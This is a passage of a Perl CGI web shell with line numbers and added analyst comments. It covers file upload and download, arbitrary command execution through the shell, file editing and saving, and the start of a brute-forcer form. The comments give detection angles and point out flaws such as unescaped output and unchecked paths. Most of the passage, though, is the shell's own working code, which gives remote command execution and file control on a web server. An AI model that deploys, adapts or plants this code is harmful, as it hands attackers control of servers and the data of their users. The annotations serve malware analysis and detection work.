  3483. #------------------------------------------------------------------------------
  3484. # This function is called when the user wants to upload a file. If the
  3485. # file is not specified, it displays a form allowing the user to specify a
  3486. # file, otherwise it starts the upload process.
  3487. #------------------------------------------------------------------------------
  3488. sub UploadFile
  3489. {
            # Writes the uploaded bytes held in $in{'filedata'} to a file in
            # $CurrentDir and returns an HTML status string followed by the
            # command form. With an empty $TransferFile it returns the upload
            # form instead.
            # Defensive relevance: this is the point where the shell drops new
            # files on disk under the web server account; file-integrity
            # monitoring of web-served directories is the control that sees it.
  3490.     # if no file is specified, print the upload form again
  3491.     if($TransferFile eq "")
  3492.     {
  3493.         return &PrintFileUploadForm;
  3494.  
  3495.     }
  3496.     my $result="";
  3497.     # start the uploading process
            # Both names are echoed into the page without HTML escaping.
  3498.     $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  3499.  
  3500.     # get the fully qualified pathname of the file to be created
            # $TargetName becomes $CurrentDir without one trailing separator; the
            # match then captures the last path component of $TransferFile in $1,
            # so directory parts sent by the client are dropped.
  3501.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  3502.     $TransferFile =~ m!([^/^\\]*)$!;
  3503.     $TargetName .= $PathSep.$1;
  3504.  
  3505.     $TargetFileSize = length($in{'filedata'});
  3506.     # if the file exists and we are not supposed to overwrite it
  3507.     if(-e $TargetName && $Options ne "overwrite")
  3508.     {
  3509.         $result .= "Failed: Destination file already exists.<br>";
  3510.     }
  3511.     else # file is not present
  3512.     {
                # Two-argument open with the mode glued to the name, on a bareword
                # handle. The print and close results are not checked, so a
                # short write is still reported as a completed transfer.
  3513.         if(open(UPLOADFILE, ">$TargetName"))
  3514.         {
  3515.             binmode(UPLOADFILE) if $WinNT;
  3516.             print UPLOADFILE $in{'filedata'};
  3517.             close(UPLOADFILE);
  3518.             $result .= "Transfered $TargetFileSize Bytes.<br>";
  3519.             $result .= "File Path: $TargetName<br>";
  3520.         }
  3521.         else
  3522.         {
  3523.             $result .= "Failed: $!<br>";
  3524.         }
  3525.     }
  3526.     $result .= &PrintCommandLineInputForm;
  3527.     return $result;
  3528. }
  3529.  
  3530. #------------------------------------------------------------------------------
  3531. # This function is called when the user wants to download a file. If the
  3532. # filename is not specified, it displays a form allowing the user to specify a
  3533. # file, otherwise it displays a message to the user and provides a link
  3534. # through  which the file can be downloaded.
  3535. #------------------------------------------------------------------------------
  3536. sub DownloadFile
  3537. {
            # Entry point for a=download. With no file name it prints the page
            # header and returns the download form. Otherwise it resolves the
            # name to a full path and returns the result of either sending the
            # file ($Options eq "go") or building the link page.
            # The path handling duplicates BeginDownload: absolute paths are taken
            # as given and relative ones are appended to $CurrentDir, with no
            # restriction on which directory the result falls in.
  3538.     # if no file is specified, print the download form again
  3539.     if($TransferFile eq "")
  3540.     {
  3541.         &PrintPageHeader("f");
  3542.         return &PrintFileDownloadForm;
  3543.     }
  3544.    
  3545.     # get fully qualified path of the file to be downloaded
            # Bitwise & and | are used where logical operators would be expected;
            # both pattern matches are evaluated regardless of $WinNT.
  3546.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  3547.     {
  3548.         $TargetFile = $TransferFile;
  3549.     }
  3550.     else # path is relative
  3551.     {
  3552.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  3553.         $TargetFile .= $PathSep.$TransferFile;
  3554.     }
  3555.  
  3556.     if($Options eq "go") # we have to send the file
  3557.     {
  3558.         return &SendFileToBrowser($TargetFile);
  3559.     }
  3560.     else # we have to send only the link page
  3561.     {
  3562.         return &PrintDownloadLinkPage($TargetFile);
  3563.     }
  3564. }
  3565.  
  3566.  
  3567. #------------------------------------------------------------------------------
  3568. # This function is called to execute commands. It displays the output of the
  3569. # command and allows the user to enter another command. The change directory
  3570. # command is handled differently. In this case, the new directory is stored in
  3571. # an internal variable and is used each time a command has to be executed. The
  3572. # output of the change directory command is not displayed to the users
  3573. # therefore error messages cannot be displayed.
  3574. #------------------------------------------------------------------------------
  3575. sub ExecuteCommand
  3576. {
            # Dispatches the request's command text ($RunCommand) three ways and
            # returns the resulting HTML: "cd <dir>" updates $CurrentDir and shows
            # a listing, "edit <file>" hands over to SaveFileForm, and anything
            # else goes to RunCmd.
            # Defensive relevance: every path through here ends in a shell child
            # of the web server or CGI process, which is what process-creation
            # telemetry on the host would record.
  3577.     my $result="";
  3578.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  3579.     {
  3580.         # we change the directory internally. The output of the
  3581.         # command is not displayed.
                # The request values are interpolated straight into a command line
                # run with backticks; $CmdSep and $CmdPwd are defined outside this
                # part of the file. chop removes the last character of the
                # output, presumably the trailing newline.
  3582.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  3583.         chop($CurrentDir = `$Command`);
  3584.         $result .= &PrintCommandLineInputForm;
  3585.  
                # $RunCommand is placed in the page without HTML escaping.
  3586.         $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  3587.         # output a listing when changing to a directory
  3588.         $RunCommand= $WinNT?"dir":"dir -lia";
  3589.         $result .= &RunCmd;
  3590.     }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  3591.     {
  3592.         $result .=  &SaveFileForm;
  3593.     }else
  3594.     {
  3595.         $result .= &PrintCommandLineInputForm;
  3596.         $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  3597.         $result .=&RunCmd;
  3598.     }
            # Appended on every branch, including the edit branch where
            # SaveFileForm has already closed its own textarea and form.
  3599.     $result .=  "</textarea>";
  3600.     return $result;
  3601. }
  3602.  
  3603. #------------------------------------------------------------------------
  3604. # run command
  3605. #------------------------------------------------------------------------
  3606.  
  3607. sub RunCmd
  3608. {
            # Builds a command line from $CurrentDir, $RunCommand and $Redirector
            # and returns HTML-escaped text for the output area. $CmdSep and
            # $Redirector are defined outside this part of the file.
  3609.     my $result="";
  3610.     $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  3611.     if(!$WinNT)
  3612.     {
                # Arms a timeout on non-Windows hosts; see CommandTimeout for what
                # the handler does when it fires.
  3613.         $SIG{'ALRM'} = \&CommandTimeout;
  3614.         alarm($CommandTimeoutDuration);
  3615.     }
  3616.     if($ShowDynamicOutput) # show output as it is generated
  3617.     {
                # Autoflush is switched on for the duration of the read. The
                # trailing " |" makes the two-argument open start the command and
                # read its output. The open result is not checked and the handle
                # is never closed in this sub.
  3618.         $|=1;
  3619.         $Command .= " |";
  3620.         open(CommandOutput, $Command);
  3621.         while(<CommandOutput>)
  3622.         {
                    # Normalise the line ending, then escape the line so command
                    # output cannot break out of the enclosing textarea.
  3623.             $_ =~ s/(\n|\r\n)$//;
  3624.             $result .= &HtmlSpecialChars("$_\n");
  3625.         }
  3626.         $|=0;
  3627.     }
  3628.     else # show output after command completes
  3629.     {
                # NOTE(review): as written on this page the argument is a
                # single-quoted literal, so this branch returns the escaped text
                # of the variable name and runs nothing. A live sample may differ
                # from the paste; verify before relying on this reading.
  3630.         $result .= &HtmlSpecialChars('$Command');
  3631.     }
  3632.     if(!$WinNT)
  3633.     {
  3634.         alarm(0);
  3635.     }
  3636.     return $result;
  3637. }
  3638. #==============================================================================
  3639. # Form Save File
  3640. #==============================================================================
  3641. sub SaveFileForm
  3642. {
            # Analyst summary: renders the "edit file" page. The dispatcher
            # earlier in this listing calls it when $RunCommand matches
            # /^\s*edit\s+(.+)/. It derives a file name from $RunCommand,
            # rewrites $RunCommand into a file-display shell command, and lets
            # RunCmd fill a <textarea> with the result.
            # Hunting hint: the form below POSTs to $ScriptLocation with the
            # field names d, c, s, a (value "save"), file and data; these names
            # can be matched in captured request bodies or WAF logs.
  3643.     my $result ="";
            # Drop the first five characters of $RunCommand (4-arg-style lvalue
            # substr); presumably this removes "edit " -- any leading whitespace
            # the dispatcher's regex allows would shift the cut.
  3644.     substr($RunCommand,0,5)="";
  3645.     my $file=&trim($RunCommand);
            # $save, $File, $msg, $rows, $Prompt and $read are not declared with
            # `my` here, so they are package globals.
  3646.     $save='<br><input name="a" type="submit" value="save" class="submit" >';
            # Path is built by plain concatenation; no normalisation or
            # filtering of the name is visible in this sub.
  3647.     $File=$CurrentDir.$PathSep.$RunCommand;
  3648.     my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
            # Writable target: taller textarea. Otherwise show a
            # "Permission denied!" banner and a shorter textarea.
  3649.     if(-w $File)
  3650.     {
  3651.         $rows="23"
  3652.     }else
  3653.     {
  3654.         $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
  3655.         $rows="20"
  3656.     }
  3657.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
            # The file is read by running `type` (Windows) or `less` via the
            # shell, with the name interpolated inside double quotes; the name
            # is therefore part of a shell command line, not just a file path.
  3658.     $read=($WinNT)?"type":"less";
  3659.     $RunCommand = "$read \"$RunCommand\"";
            # The heredoc interpolates $ScriptLocation, $CurrentDir, $Prompt,
            # $RunCommand, $file, $save, $msg, $cols and $rows into the HTML
            # without escaping in this sub.
  3660.     $result .=  <<END;
  3661.     <form name="f" method="POST" action="$ScriptLocation">
  3662.  
  3663.     <input type="hidden" name="d" value="$CurrentDir">
  3664.     $Prompt
  3665.     <input type="text" size="40" name="c">
  3666.     <input name="s" class="submit" type="submit" value="Enter">
  3667.     <br>Command: <run> $RunCommand </run>
  3668.     <input type="hidden" name="file" value="$file" > $save <br> $msg
  3669.     <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  3670. END
  3671.    
            # Textarea body = output of the display command built above.
  3672.     $result .= &RunCmd;
  3673.     $result .=  "</textarea>";
  3674.     $result .=  "</form>";
  3675.     return $result;
  3676. }
  3677. #==============================================================================
  3678. # Save File
  3679. #==============================================================================
  3680. sub SaveFile($)
  3681. {
            # Analyst summary: writes caller-supplied data to a caller-supplied
            # file name under $CurrentDir and returns 1 on success, 0 if the
            # open fails. Runs with whatever privileges the CGI process has.
            # Detection angle (hedged): file creation or truncation by the web
            # server's CGI/Perl process, especially inside the document root.
            #
            # The ($) prototype declares one scalar, but two arguments are
            # shifted off @_; callers are outside this excerpt -- the rest of
            # the file uses &-style calls, which bypass prototypes.
  3682.     my $Data= shift ;
  3683.     my $File= shift;
            # Plain concatenation: no check here for path separators or ".."
            # inside $File.
  3684.     $File=$CurrentDir.$PathSep.$File;
            # Two-argument open with ">" prefix: truncates or creates the
            # target. Bareword handle FILE is a package global.
  3685.     if(open(FILE, ">$File"))
  3686.     {
                # Binary mode so the payload is written byte-for-byte; the
                # results of print and close are not checked.
  3687.         binmode FILE;
  3688.         print FILE $Data;
  3689.         close FILE;
  3690.         return 1;
  3691.     }else
  3692.     {
  3693.         return 0;
  3694.     }
  3695. }
  3696. #------------------------------------------------------------------------------
  3697. # Brute Forcer Form
  3698. #------------------------------------------------------------------------------
  3699. sub BruteForcerForm
  3700. {
  3701.     my $result="";
  3702.     $result .= <<END;
  3703.